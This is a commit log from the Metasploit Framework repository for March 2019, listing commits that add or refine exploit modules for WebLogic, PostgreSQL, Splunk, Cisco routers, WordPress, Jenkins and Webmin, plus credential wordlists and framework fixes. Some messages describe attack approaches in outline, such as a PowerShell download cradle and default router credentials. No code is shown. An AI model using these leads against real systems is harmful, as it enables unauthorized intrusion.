This PR gets us back to where we should have been, with #11131 landed and a few changes to add randomization and expanding on the T3 protocol.
2019-03-26 17:54:37 -05:00
Metasploit e859608b3d automatic module_metadata_base.json update 2019-03-26 15:18:44 -07:00
asoto-r7 385cfd679a Land #11131, Weblogic_serialize_rawobject CVE-2015-4852 2019-03-26 17:07:04 -05:00
asoto-r7 26b67bbf91 Fix two-byte error, add randomization, T3 notes from @acamro 2019-03-26 16:45:17 -05:00
asoto-r7 5f5d475c2e Add expected traceback error to documentation 2019-03-26 16:44:45 -05:00
asoto-r7 f9361324bd Merge branch 'weblogic_serialize_rawobject' of git://github.com/acamro/metasploit-framework into acamro-weblogic_serialize_rawobject 2019-03-26 16:38:27 -05:00
Jacob 3c66b4fad2 Update postgres_copy_from_program_cmd_exec.rb 2019-03-26 20:22:55 +00:00
Jacob 242f48744e Update postgres_copy_from_program_cmd_exec.rb 2019-03-26 20:18:50 +00:00
Brendan Coles d9fc7af68e Fix version detection 2019-03-26 20:17:34 +00:00
h00die 75ec3e7df6 add date and more docs 2019-03-26 16:13:42 -04:00
Jacob 4ef10013db COMMAND removed 2019-03-26 18:59:52 +00:00
Jacob 0d6cbc90c5 Update postgres_copy_from_program_cmd_exec.rb 2019-03-26 18:54:20 +00:00
Pearce Barry 20f868c15c Complain loudly if module has no 'Author' metadata. 2019-03-26 13:27:57 -05:00
Metasploit 79d22ef0d7 automatic module_metadata_base.json update 2019-03-26 11:20:46 -07:00
Brent Cook b2d047b0b1 Land #11622, merge common hash identifier code between modules 2019-03-26 13:12:00 -05:00
Metasploit 506105bcf5 automatic module_metadata_base.json update 2019-03-26 11:07:28 -07:00
Brent Cook b204c9999e Land #11628, Outlook credentials post module update 2019-03-26 12:57:52 -05:00
Brent Cook 8314e456b8 Land #11634, Add defensive check to Msf::Payload::UUID::Options#record_payload_uuid_url 2019-03-26 12:32:44 -05:00
Brent Cook d5e777aabf Land #11572, bump to Ruby 2.6.2 2019-03-26 12:12:57 -05:00
Matthew Kienow cf42f47e5b Check that payload was returned before processing 2019-03-26 11:41:27 -04:00
tiyeuse 78fd1f3b19 Merge pull request #1 from space-r7/pr11587_updates
Add checks to scan function and fix some spacing
2019-03-26 10:27:38 +01:00
Jeffrey Martin 582f86b75c Land #11603, Fail nicely when load aggregator. 2019-03-25 23:20:49 -05:00
7043mcgeep f62e9c2e49 Updated doc 2019-03-25 22:42:19 -05:00
Brent Cook d168895311 Land #11631, payloads db fixes 2019-03-25 19:16:11 -05:00
Matthew Kienow dc3be3378d Process workspace for use in the create operation 2019-03-25 19:41:51 -04:00
Matthew Kienow 1b86c41dcc Add add_opts_workspace call to query and create 2019-03-25 19:39:25 -04:00
Matthew Kienow 6278563f25 Remove unused code 2019-03-25 19:38:28 -04:00
Shelby Pace d185e8a018 indentation fix 2019-03-25 14:54:46 -05:00
Shelby Pace 3a8b09f08e added checks on scan method 2019-03-25 14:48:19 -05:00
Shelby Pace 59f5c291c9 removed spare spaces and modified some indentation 2019-03-25 14:25:09 -05:00
Shelby Pace 2ccd753ff5 modified scenario output for path 2019-03-25 13:58:58 -05:00
Matthew Kienow 6709780817 Add entry to autoload PayloadDataProxy 2019-03-25 13:43:16 -04:00
Matthew Kienow 98401072e5 Remove duplicate autoload for WebDataProxy 2019-03-25 13:38:32 -04:00
7043mcgeep a8ccc7eb25 Remove tabbed indents 2019-03-25 11:13:28 -05:00
7043mcgeep b91231021a Hashdump adheres to better coding style. Add docs 2019-03-25 02:36:34 -05:00
Spencer McIntyre e962f94fab Handle spaces in tab completed words 2019-03-24 20:44:51 -04:00
rwincey 9d71020d9c Removed credit 2019-03-24 19:11:22 -04:00
Jacob 91e869a970 Update postgres_copy_from_program_cmd_exec.rb 2019-03-24 22:48:42 +00:00
Jacob 3b0f399730 Update postgres_copy_from_program_cmd_exec.rb 2019-03-24 22:44:31 +00:00
rwincey 8a36a0f410 Added support for later versions of Outlook, rubocop complaints 2019-03-24 18:39:55 -04:00
Quentin Kaiser 9baaedce4e Indicate potential DoS in description. Define exploit stance explicitly. 2019-03-24 22:29:07 +01:00
Quentin Kaiser 5c048e7cd6 CISCO-SA not supported. 2019-03-24 22:20:31 +01:00
bcoles 55939a64a0 Update modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
2019-03-24 19:32:29 +00:00
Jacob 74464a2087 Update postgres_copy_from_program_cmd_exec.rb 2019-03-24 18:17:43 +00:00
Jacob a62e70cdfd Update postgres_copy_from_program_cmd_exec.md 2019-03-24 18:10:28 +00:00
Jacob 248136ff44 Update postgres_copy_from_program_cmd_exec.md 2019-03-24 18:09:31 +00:00
Jacob b33de7c596 Update postgres_copy_from_program_cmd_exec.md 2019-03-24 17:49:40 +00:00
Jacob 5c16d18a48 Update postgres_copy_from_program_cmd_exec.md 2019-03-24 17:47:30 +00:00
Jacob 5448ad7f4a Update postgres_copy_from_program_cmd_exec.md 2019-03-24 17:45:15 +00:00
Quentin Kaiser ddb21a9061 Fix numbering. 2019-03-24 17:52:11 +01:00
Quentin Kaiser be73f56610 Only got researchers name, no email. 2019-03-24 17:50:31 +01:00
Quentin Kaiser 4451225da7 Add httpd service reloading. 2019-03-24 17:49:55 +01:00
Jacob 3c0a9d0748 Update postgres_copy_from_program_cmd_exec.rb 2019-03-24 15:37:10 +00:00
bcoles f14b213725 Update modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
2019-03-24 15:36:25 +00:00
Jacob 27b3717add Update postgres_copy_from_program_cmd_exec.rb 2019-03-24 15:35:59 +00:00
rwincey 7f2e6866d4 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2019-03-24 11:13:41 -04:00
h00die 656ea5240d remove space at EOL 2019-03-24 08:11:24 -04:00
h00die dfa1ab3a9b es file explorer 2019-03-24 08:01:32 -04:00
7043mcgeep 170d28d46b 12c hashdump supported 2019-03-23 13:37:19 -05:00
7043mcgeep d1cad4eb21 Add 12c support for hashdump 2019-03-23 13:15:38 -05:00
h00die 5ea406cd4c create hash identifier library 2019-03-23 14:02:34 -04:00
Brent Cook 6218d8920d Land #11615, allow exporting creds to a JTR-compatible format 2019-03-23 09:08:35 -05:00
Brent Cook d7255bbbb2 Land #11616, add get_payload method to db_manager 2019-03-23 08:25:28 -05:00
Metasploit 6b470e40a3 automatic module_metadata_base.json update 2019-03-23 04:37:29 -07:00
h00die 82a791369e remove extra spacing 2019-03-23 07:34:22 -04:00
Brent Cook 4eee987181 Land #11619, improve error handling with exploits/linux/http/panos_readsessionvars 2019-03-23 06:28:57 -05:00
h00die 759dbc86b1 land #11617 ssh library unifi cleanup 2019-03-23 07:12:23 -04:00
h00die c8785a6110 rstrip all the things 2019-03-23 07:04:41 -04:00
bcoles 5e470a538d return unless res 2019-03-23 19:38:14 +11:00
Brendan Coles ccc8d9cdab return unless res 2019-03-23 08:51:25 +00:00
h00die 6aca047dbb unifi ssh cleanup 2019-03-22 21:51:41 -04:00
h00die aada613cff Merge branch 'master' of https://github.com/rapid7/metasploit-framework into jtrout 2019-03-22 21:26:36 -04:00
Matt Robinson 771cd60a5e Add missing get_payload() method 2019-03-22 21:25:23 -04:00
h00die 0613018fc2 remove unused function 2019-03-22 21:22:39 -04:00
h00die 6d59b29884 move jtr output to -o function 2019-03-22 21:03:06 -04:00
bwatters a7fa20dfe1 Land #11614, Update payloads to 1.3.65
Merge branch 'land-11614' into upstream-master
2019-03-22 20:01:20 -05:00
Quentin Kaiser 5562af39d3 Use CmdStager instead of hardcoded wget command. 2019-03-22 20:10:29 +01:00
h00die f00c38cfe2 make creds exporter for jtr format 2019-03-22 15:04:58 -04:00
bwatters 46bb59e133 Update payloads to 1.3.65 2019-03-22 11:55:48 -05:00
wilfried 8853d6d5b5 Adding documentation + cleaning files from the exploit 2019-03-22 17:37:04 +01:00
Quentin Kaiser ef2c4310a4 Exploit for CVE-2019-1663 on Cisco RV130(W). 2019-03-22 17:34:12 +01:00
William Vu 1c349269c9 Land #11612, ipmi_users.txt update 2019-03-22 11:04:28 -05:00
Justin Bollinger c98ed4b494 Updated ipmi_users.txt
Added username 'Admin'
2019-03-22 11:40:24 -04:00
bcoles 567be6fa11 Update modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
2019-03-22 11:18:07 +00:00
Metasploit ae602bedbf automatic module_metadata_base.json update 2019-03-22 03:25:32 -07:00
Brent Cook 712cbecab3 Land #11570, Add option to keep temp files with JTR modules 2019-03-22 05:16:56 -05:00
Brent Cook 11951c18ab Land #11605, Improve tab completion for the load command. 2019-03-22 05:10:20 -05:00
bcoles 3f3395768a Fix a potential regexp issue
Co-Authored-By: Green-m <greenm.xxoo@gmail.com>
2019-03-22 10:36:23 +08:00
bcoles 5a38cf17de Typo fix.
Co-Authored-By: Green-m <greenm.xxoo@gmail.com>
2019-03-22 10:34:35 +08:00
h00die 49b936f0d5 fix case of variable 2019-03-21 20:54:32 -04:00
William Vu c796fe6d6d Land #11608, unpkg-hosted Swagger UI (redux)
This prevents git grep or searches of the tree from exploding with text.
2019-03-21 14:53:10 -05:00
James Barnett 0a4932a61c Remove swagger-ui css files 2019-03-21 12:52:30 -05:00
Metasploit 6be369e3bc Bump version of framework to 5.0.14 2019-03-21 10:09:15 -07:00
PietroBiondi 0af9b8949e add doc of can_flood automotive 2019-03-21 18:05:02 +01:00
Metasploit cc1d9a1e7b automatic module_metadata_base.json update 2019-03-21 09:41:47 -07:00
Jacob Robles 94e58511ec Land #11607, Add webmin CVE 2019-03-21 11:33:33 -05:00
Metasploit 3570d3e1f2 automatic module_metadata_base.json update 2019-03-21 09:30:04 -07:00
Jacob Robles 16a48009ed Add webmin CVE 2019-03-21 11:28:45 -05:00
William Vu ee382f9be2 Land #11606, jenkins_metaprogramming fixes 2019-03-21 11:21:47 -05:00
William Vu 4524707437 Fix rebase regressions in jenkins_metaprogramming
Ugh.
2019-03-21 11:20:21 -05:00
Jacob 00cf0a7bea Update postgres_copy_from_program_cmd_exec.rb 2019-03-21 14:23:00 +00:00
Jacob Robles 820e0def05 Land #11604, fix typo in ffautoregen 2019-03-21 07:02:47 -05:00
Jacob 91758cd94b Update postgres_copy_from_program_cmd_exec.rb 2019-03-21 11:11:03 +00:00
Jacob 98638b6000 Update postgres_copy_from_program_cmd_exec.rb 2019-03-21 11:09:57 +00:00
Jacob 03775228fe Update and rename postgres_cmd_execution_nine_three.rb to postgres_copy_from_program_cmd_exec.rb 2019-03-21 11:08:53 +00:00
Jacob 327f126beb Update postgres_copy_from_program_cmd_exec.md 2019-03-21 11:06:16 +00:00
Jacob cf9f073a24 Rename postgres_cmd_execution_nine_three.md to postgres_copy_from_program_cmd_exec.md 2019-03-21 11:05:55 +00:00
Jacob 06912ff74c Create postgres_cmd_execution_nine_three.md 2019-03-21 10:52:32 +00:00
Green-m 2c05ce5377 Enhance the load completion. 2019-03-21 18:31:32 +08:00
Jacob f651836a20 final suggested fixes to module 2019-03-21 10:24:47 +00:00
Jacob 9c4b9239e5 Update postgres_cmd_execution_nine_three.rb 2019-03-21 10:08:56 +00:00
Jacob 32bf2e134f Fixes suggested by bcoles 2019-03-21 10:08:04 +00:00
Green-m d01fc4c1c6 Fix typo. 2019-03-21 17:37:05 +08:00
bcoles 7b8f59d7bc Update modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
2019-03-21 09:33:29 +00:00
Green-m 3ff7a4a639 Fail nicely when load aggregator. 2019-03-21 17:16:03 +08:00
Christian Mehlmauer fb8cc3c992 update ruby 2.5.5 too 2019-03-21 09:34:01 +01:00
Jacob 7e91235551 Adding new Postgres_cmd_execution module
PostgreSQL from 9.3 to latest has functionality allowing the database superuser & users in the 'pg_read_server_files' group to execute OS commands. 

Explanation:
https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

This is my first run through of a Metasploit module so I would appreciate anyone helping me clean it up. It currently works on OSX & Linux by providing a cmd stager (like cmd/unix/reverse_perl), and on windows by first starting up a PowerShell download cradle, then putting the command in the COMMAND parameter. It feels a little hacky though 😁
2019-03-20 17:38:12 +00:00
fabiocogno c923fc9b21 Update cmsms_showtime2_rce.md 2019-03-20 15:51:53 +01:00
fabiocogno be5ec3379b Update cmsms_showtime2_rce.rb 2019-03-20 15:50:30 +01:00
PietroBiondi cb7b9080bd 1) changed print_status with vprint_status 2) Fix iterations and line splits 3) Changed name of the module 4) removed DisclosureDate 2019-03-20 15:13:41 +01:00
blightzero 9bb7f11897 Unregister SSLCert option since it is never used in thisHTTPServer module. 2019-03-20 14:21:40 +01:00
blightzero ac75de8a03 Added Documentation for Cisco RV32x remote code execution module. 2019-03-20 14:17:57 +01:00
bcoles c18ab91054 Update modules/exploits/multi/http/cmsms_showtime2_rce.rb
Co-Authored-By: fabiocogno <fabio.cogno@gmail.com>
2019-03-20 14:13:38 +01:00
bcoles e0a3e01d26 Update modules/exploits/multi/http/cmsms_showtime2_rce.rb
Co-Authored-By: fabiocogno <fabio.cogno@gmail.com>
2019-03-20 14:13:25 +01:00
bcoles 365e032452 Update modules/exploits/multi/http/cmsms_showtime2_rce.rb
Co-Authored-By: fabiocogno <fabio.cogno@gmail.com>
2019-03-20 14:13:12 +01:00
bcoles 49bb5a1624 Update modules/exploits/multi/http/cmsms_showtime2_rce.rb
Co-Authored-By: fabiocogno <fabio.cogno@gmail.com>
2019-03-20 14:13:00 +01:00
bcoles 050aa7a98c Update modules/exploits/multi/http/cmsms_showtime2_rce.rb
Co-Authored-By: fabiocogno <fabio.cogno@gmail.com>
2019-03-20 14:12:47 +01:00
bcoles fe0d5e0c97 Update modules/exploits/multi/http/cmsms_showtime2_rce.rb
Co-Authored-By: fabiocogno <fabio.cogno@gmail.com>
2019-03-20 14:12:35 +01:00
Metasploit 2bb0d8491f automatic module_metadata_base.json update 2019-03-20 05:24:12 -07:00
PietroBiondi ce218fc86a Add can_flood post exploitation for CAN and added example list of frames 2019-03-20 13:17:41 +01:00
Brent Cook 3189864a98 Land #11585, Add IBM BigFix Sites Packages Enum 2019-03-20 07:12:55 -05:00
Jacob Robles fd65273b4d Add Module Doc 2019-03-20 06:40:22 -05:00
Fabio Cogno 43f74b1cf2 Add CMS Made Simple (CMSMS) Showtime2 File Upload RCE 2019-03-19 23:48:46 +01:00
Matteo Malvica 6b0f7fd9f1 Update splunk_upload_app_exec.md 2019-03-19 22:44:07 +01:00
Shelby Pace 794134735e Update modules/exploits/unix/webapp/wp_crop_rce.rb
Co-Authored-By: tiyeuse <39072217+tiyeuse@users.noreply.github.com>
2019-03-19 20:36:13 +01:00
Jacob Robles a8095b8784 Additional Options 2019-03-19 12:53:27 -05:00
wilfried b168312db1 Add exploit module for Wordpress core <=4.9.8 (CVE-2019-8942) 2019-03-19 17:51:59 +01:00
Metasploit 59046eba20 Bump version of framework to 5.0.13 2019-03-19 08:17:20 -07:00
wilfried 23a86e7ad2 Add exploit module for Wordpress core <=4.9.8 (CVE-2019-8942) 2019-03-19 16:03:29 +01:00
Matteo Malvica a2d6c77fb8 indentation fixes 2019-03-19 15:28:24 +01:00
bcoles fe0adb9ca1 Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md
Co-Authored-By: avanzo <matteo@malvica.com>
2019-03-19 15:11:43 +01:00
bcoles 91d4c00c37 Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md
Co-Authored-By: avanzo <matteo@malvica.com>
2019-03-19 15:11:30 +01:00
bcoles ed52ac685d Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md
Co-Authored-By: avanzo <matteo@malvica.com>
2019-03-19 15:11:18 +01:00
bcoles 418581d4d3 Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md
Co-Authored-By: avanzo <matteo@malvica.com>
2019-03-19 15:11:06 +01:00
Matteo Malvica 985f3748e5 Update splunk_upload_app_exec.rb 2019-03-19 15:08:51 +01:00
Matteo Malvica 92c163cb0d Update splunk_upload_app_exec.md 2019-03-19 15:00:26 +01:00
Matteo Malvica c9dcdf1b66 new error logic 2019-03-19 14:58:31 +01:00
Jacob Robles 65fab88a2e Add IBM BigFix Sites Packages Enum 2019-03-19 08:51:00 -05:00
Matteo Malvica 98a7938837 Update splunk_upload_app_exec.rb 2019-03-19 14:42:56 +01:00
bcoles aff77e58bf Update modules/exploits/multi/http/splunk_upload_app_exec.rb
Co-Authored-By: avanzo <matteo@malvica.com>
2019-03-19 13:57:19 +01:00
bcoles 290a422102 Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md
Co-Authored-By: avanzo <matteo@malvica.com>
2019-03-19 13:56:32 +01:00
bcoles 109b2bcf7e Update modules/exploits/multi/http/splunk_upload_app_exec.rb
Co-Authored-By: avanzo <matteo@malvica.com>
2019-03-19 13:46:57 +01:00
bcoles f98ad82583 Update modules/exploits/multi/http/splunk_upload_app_exec.rb
Co-Authored-By: avanzo <matteo@malvica.com>
2019-03-19 13:46:44 +01:00
Matteo Malvica 698cf5ea91 Update splunk_upload_app_exec.md 2019-03-19 11:02:44 +01:00
Matteo Malvica 087cef380d Update splunk_upload_app_exec.md 2019-03-19 11:02:01 +01:00
Matteo Malvica 3fc4a4cb58 Update splunk_upload_app_exec.md 2019-03-19 11:00:11 +01:00
Matteo Malvica c5c597ec17 Update splunk_upload_app_exec.md 2019-03-19 10:56:54 +01:00
Matteo Malvica a0adb779b9 Update splunk_upload_app_exec.md 2019-03-19 10:54:52 +01:00
Matteo Malvica a09ee632e8 Update splunk_upload_app_exec.md 2019-03-19 10:53:55 +01:00
Matteo Malvica e5653e348d Update splunk_upload_app_exec.md 2019-03-19 10:52:07 +01:00
Matteo Malvica ca234a1f9b Update splunk_upload_app_exec.md 2019-03-19 10:45:42 +01:00
Matteo Malvica d739ac2315 added tested list OS 2019-03-19 10:44:12 +01:00
Matteo Malvica 3ca4a9bc03 Update splunk_upload_app_exec.md 2019-03-19 10:36:35 +01:00
Matteo Malvica f0dee60d58 Update splunk_upload_app_exec.md 2019-03-19 10:30:03 +01:00
Matteo Malvica 998f9403ff Update splunk_upload_app_exec.md 2019-03-18 19:04:57 +01:00
Matteo Malvica 983442d690 Update splunk_upload_app_exec.rb 2019-03-18 19:04:45 +01:00
Matteo Malvica 245a6cac63 Update splunk_upload_app_exec.md 2019-03-18 19:03:35 +01:00
Matteo Malvica 3316e8c4bf fixed standard payload syntax 2019-03-18 19:00:33 +01:00
Matteo Malvica d7d49cba2e Update splunk_upload_app_exec.md 2019-03-18 15:20:28 +01:00
Matteo Malvica 2f1ee95073 Update splunk_upload_app_exec.rb 2019-03-18 15:11:04 +01:00
Matteo Malvica f6e9410d87 Update splunk_upload_app_exec.md 2019-03-18 14:43:47 +01:00
Matteo Malvica 9e2100ca22 Update splunk_upload_app_exec.md 2019-03-18 14:42:33 +01:00
Matteo Malvica 70a705a303 Update splunk_upload_app_exec.md 2019-03-18 14:41:46 +01:00
Matteo Malvica 2605611e56 Update splunk_upload_app_exec.md 2019-03-18 14:37:05 +01:00
Metasploit bdb8d3b9e6 automatic module_metadata_base.json update 2019-03-18 05:37:31 -07:00
Jacob Robles 24143f812c Land #11466, Add Jenkins ACL bypass and metaprogramming RCE 2019-03-18 07:21:13 -05:00
Matteo Malvica 8ee308da8a Update splunk_upload_app_exec.md 2019-03-18 12:15:48 +01:00
Matteo Malvica ba60536585 duplicate 2019-03-18 12:15:16 +01:00
Matteo Malvica 029d42a649 included link list 2019-03-18 10:35:00 +01:00
bcoles c7d2b6c18e Update documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md
Co-Authored-By: avanzo <matteo@malvica.com>
2019-03-18 10:30:54 +01:00
Matteo Malvica c5871d8a5d adding documentation to splunk modukle 2019-03-18 09:13:01 +01:00
Matteo Malvica 7a31fc2d17 added splunk 7.2.4 support 2019-03-18 09:12:00 +01:00
Matteo Malvica 4af2b87a79 Create splunk_upload_app_exec.md 2019-03-17 22:23:11 +01:00
William Vu af941b7541 Land #11573, Windows 2019 support in Windows::Priv 2019-03-17 12:13:55 -05:00
William Vu d1bf6e87e2 Land #11568, Ubiquiti USG SSH LoginScanner support 2019-03-17 12:11:04 -05:00
Brendan Coles e00b21d319 2019 2019-03-17 06:43:43 +00:00
Brendan Coles 188f4da5a5 Land #11571, Change cable-d to cable-docsis in snmp_default_pass.txt 2019-03-17 00:05:34 +00:00
Christian Mehlmauer 98bf0d6fcf ruby 2.6.2 2019-03-16 21:31:19 +01:00
El Nerdo ac0dc8be1f cable-d -> cable-docsis
cable-docsis is a known hidden community string in Cisco devices.
www.cisco.com/warp/public/707/cisco-sa-20010228-ios-snmp-community.shtml

To me, it looks like cable-d should be cable-docsis
2019-03-16 20:55:43 +01:00
William Vu 6658584142 Update HttpServer documentation 2019-03-16 13:55:04 -05:00
William Vu a1e6d4d19a Update note about staging payloads over HTTPS 2019-03-16 13:36:58 -05:00
h00die 14febf69aa add no cleanup to jtr modules 2019-03-16 11:39:59 -04:00
h00die 33bc0b3a1d add unifi USG to ssh details 2019-03-16 08:35:32 -04:00
William Vu b2c21c754f Add module doc 2019-03-16 00:39:22 -05:00
William Vu 621fa8e4db Fix issues and refactor module 2019-03-16 00:38:48 -05:00
William Vu 0fa2d985e7 Add Jenkins ACL bypass and metaprogramming RCE 2019-03-16 00:32:36 -05:00
Metasploit b021cbafa9 automatic module_metadata_base.json update 2019-03-15 11:31:19 -07:00
Brent Cook f2edda207f Land #11382, Added BMC Patrol Agent Command Exec Module 2019-03-15 13:21:06 -05:00
Metasploit 6a51e15d2b automatic module_metadata_base.json update 2019-03-15 06:42:10 -07:00
Brent Cook 2512156197 Land #11564, add a JavaMeterpreterDebug option to the java payloads 2019-03-15 08:19:58 -05:00
Jacob Robles 82f0c9e9ee Land #11385, Add Webmin Upload Exec 2019-03-15 08:15:49 -05:00
Brent Cook 69ff7b7698 Land #11561, Add OpenSUSE detection to Linux system lib 2019-03-15 07:57:26 -05:00
Brent Cook 6e5a5c33f5 Land #11567, Bump ActiveRecord version in PG deprecated warning suppression 2019-03-15 07:55:05 -05:00
Brent Cook 2bf3603cc3 Land #11553, show user bundler exception, remove outdated advice 2019-03-15 07:54:12 -05:00
Brent Cook 1f68141cfb neither Dockerfile nor Vagrant should actually install bundler these days 2019-03-15 07:19:18 -05:00
Brent Cook 180c395aa3 just print the error, but don't give specific advice 2019-03-15 07:18:48 -05:00
Matthew Kienow eeb131be29 Increase ActiveRecord version number 2019-03-15 02:23:12 -04:00
William Vu 9b8cc607ef Land #11554, irb and pry for command shells 2019-03-14 13:59:07 -05:00
Jacob Robles 5abfc2c136 Add Module Doc 2019-03-14 13:46:34 -05:00
Jacob Robles fa3e84f764 Cleanup and Add Option 2019-03-14 13:26:41 -05:00
Metasploit 4793f28e28 Bump version of framework to 5.0.12 2019-03-14 10:06:42 -07:00
Tim W 5cfe5b4567 add JavaMeterpreterDebug option 2019-03-14 23:43:22 +08:00
Jacob Robles 1d586e46c0 Use MIME for form 2019-03-14 10:13:48 -05:00
blightzero 1e00c28701 Checked the functionality of module. Added ability to connect via HTTPS. 2019-03-14 15:54:02 +01:00
William Vu 173f251845 Land #11558, Ubiquiti UniFi for SSH LoginScanner 2019-03-14 09:53:57 -05:00
Jacob Robles 9a32231cb5 Change upload and add option
Change the contents of the uploaded file and
don't overwrite and existing file by default.
Add option to specify name of file.
2019-03-14 09:34:55 -05:00
Brent Cook 3027df6ab3 final tweaks 2019-03-14 06:47:58 -05:00
Brent Cook 2a906a2a32 be even clearer 2019-03-14 06:31:54 -05:00
Brent Cook e1e13d964d give better specific instructions where bundler versions are stepping on each other 2019-03-14 06:27:37 -05:00
h00die 724d5c5a26 spaces EOL 2019-03-13 20:48:07 -04:00
h00die f836329bce add osx 2019-03-13 20:20:18 -04:00
Brendan Coles 56bff4f748 Add OpenSUSE detection to Linux system lib 2019-03-13 23:18:54 +00:00
Adam Cammack a73393a0ea Land #11559, Fix check command with no arguments 2019-03-13 14:26:31 -05:00
Jacob Robles a00f4bf508 Check fix
Account for empty args array
2019-03-13 09:18:18 -05:00
h00die a0b1ca1767 detect unifi in ssh sessions 2019-03-12 20:35:32 -04:00
William Vu 7a1b11b1b8 Support command-specific help command 2019-03-12 19:08:32 -05:00
Brendan Coles b6c0643b6d Land #11557, Add root/ubnt default creds to wordlists/routers_userpass.txt 2019-03-13 00:02:26 +00:00
h00die 42be66a2cf add root/ubnt to router creds 2019-03-12 19:26:58 -04:00
Metasploit cc3cc7b7dd automatic module_metadata_base.json update 2019-03-12 14:39:30 -07:00
Wei Chen 926d5842a2 Land #11547, Add Total.js Directory Traversal module 2019-03-12 16:31:21 -05:00
Wei Chen 8989ee9a9f Update format for doc 2019-03-12 16:30:36 -05:00
William Vu e46893bfbd Split command using Shellwords.shellwords 2019-03-12 13:34:51 -05:00
William Vu 9186e00167 Add irb and pry commands to command shells 2019-03-12 12:22:12 -05:00
Brent Cook c197a0d019 actually show why bundler failed to load 2019-03-12 11:33:34 -05:00
Jacob Robles bd1cd7fae8 Bug and style fixes
webmin RCE
2019-03-12 10:54:43 -05:00
William Vu 996c406e71 Land #11552, soft error for invalid module names 2019-03-12 10:34:54 -05:00
William Vu 8e9c207d26 Clarify module name is filename as per msftidy 2019-03-11 23:53:36 -05:00
William Vu 1d8538caee Direct user to framework.log for load problems
This reduces long lines and cluttered output during startup.
2019-03-11 23:40:59 -05:00
William Vu 6c4729de7e Prefer a soft error for invalid module names 2019-03-11 22:54:34 -05:00
William Vu c06190c122 Revert Msf::ModuleLoadError exception
Msf::Modules::Error is already a thing! My bad.
2019-03-11 22:34:37 -05:00
William Vu fd20d29fd7 Land #11551, jobify fix for aux modules 2019-03-11 16:33:55 -05:00
Fabio Cogno e906ecb163 Add a function to check extensions 2019-03-11 22:23:11 +01:00
h00die 95f6630d32 unifi reviews 2019-03-11 17:20:00 -04:00
Metasploit 6ad2d380dd automatic module_metadata_base.json update 2019-03-11 14:00:51 -07:00
Brent Cook 896f4cd933 Land #11543, tweak rubocop settings 2019-03-11 15:50:05 -05:00
Brent Cook 5ee43d43d6 Land #11544, add reregister_tcp/udp_options 2019-03-11 15:49:23 -05:00
Brent Cook b731f3e619 remove Ruby 2.2 constraint 2019-03-11 15:32:25 -05:00
Metasploit 8112978aac automatic module_metadata_base.json update 2019-03-11 13:19:00 -07:00
Shelby Pace a4c1181b9f Land #11545, Add elFinder Command Injection 2019-03-11 15:01:46 -05:00
Brent Cook d14ace42ed fix jobify support with aux modules
Looks like we hit another bug involving variable scope in parameters passed down to run_simple via 'run_single'. Since 'run_single' doesn't actually even run a single invocation of a module, let's just unwind that function, and get the rest of the parameters passed down.

This also explicitly disables 'jobify' support for non-scanner aux modules with multiple targets, which I don't think we're ready for until we add the RHOSTS iteration to the module proper. Otherwise, we'll have an explosion of jobs in the current implementation.
2019-03-11 14:20:34 -05:00
Fabio Cogno bb7be797b4 Add documentation 2019-03-10 23:03:16 +01:00
Fabio Cogno 8822b82a28 Refactory and fix 2019-03-10 22:39:27 +01:00
h00die a8b09e17da unifi backup downloader 2019-03-10 16:20:42 -04:00
Fabio Cogno 14e0643962 Refactory and fix 2019-03-10 19:33:08 +01:00
Fabio Cogno 0a5964d2a4 Add Total.js Directory Traversal module 2019-03-10 18:47:53 +01:00
Fabio Cogno eb6f0d5620 Add Total.js Directory Traversal module 2019-03-10 17:57:24 +01:00
rwincey 59fc1ec7ab Rubocop changes 2019-03-09 12:22:04 -05:00
Brendan Coles 6d14a53c80 Update tested versions 2019-03-09 04:41:51 +00:00
Brent Cook 19e6507ac4 tweak rubocop disabling some less desirable noise 2019-03-08 21:55:21 -06:00
Brendan Coles 601dc1c79b Add documentation 2019-03-09 03:24:26 +00:00
Brendan Coles 9aa01c9ed2 Add elfinder_php_connector_exiftran_cmd_injection exploit 2019-03-09 03:24:18 +00:00
Brent Cook 172a984d60 add deregister_tcp/udp_options 2019-03-08 16:04:32 -06:00
Brent Cook 1bf93ab1bc Land #11061, allow the possibilty of empty string values for datastore options in msf5 2019-03-08 09:27:50 -06:00
Metasploit 0b39b6efc7 automatic module_metadata_base.json update 2019-03-07 16:25:17 -08:00
Brent Cook 7c97ca6a8e Land #11535, add deregister_http_client_options 2019-03-07 18:16:14 -06:00
Metasploit 6b6069e907 automatic module_metadata_base.json update 2019-03-07 10:34:08 -08:00
Wei Chen cf19a711fd Land #11427, Add Fortinet SSL VPN Bruteforce Login Utility 2019-03-07 12:25:41 -06:00
Metasploit 1588928b44 Bump version of framework to 5.0.11 2019-03-07 10:06:39 -08:00
Brent Cook 433af12942 add deregister_http_client_options 2019-03-06 19:37:56 -06:00
blightzero 0551f3df3c Refactored code to return early. Untested. 2019-03-05 17:55:34 +01:00
Andres Rodriguez ea45468639 Merge branch 'master' of github.com:rapid7/metasploit-framework into weblogic_serialize_unicastref 2019-03-02 00:49:13 -08:00
rwincey f05d86ffae Even Less Code 2019-02-28 21:49:29 -05:00
rwincey b96326ec80 Less Code 2019-02-28 21:48:25 -05:00
blightzero 5f8f49ebcb Removed all Warnings and Fixed Date Format. 2019-02-26 09:20:04 +01:00
blightzero c8c3d7a245 Merging upstream changes to current state.
Merge branch 'master' of github.com:blightzero/metasploit-framework
2019-02-25 15:51:54 +01:00
blightzero f64e517b73 Cisco RV32x RCE added reference IDs, some beautifications. 2019-02-25 15:51:14 +01:00
blightzero de5a5ea805 Cisco RV32x RCE added reference IDs, some beautifications. 2019-02-25 15:51:14 +01:00
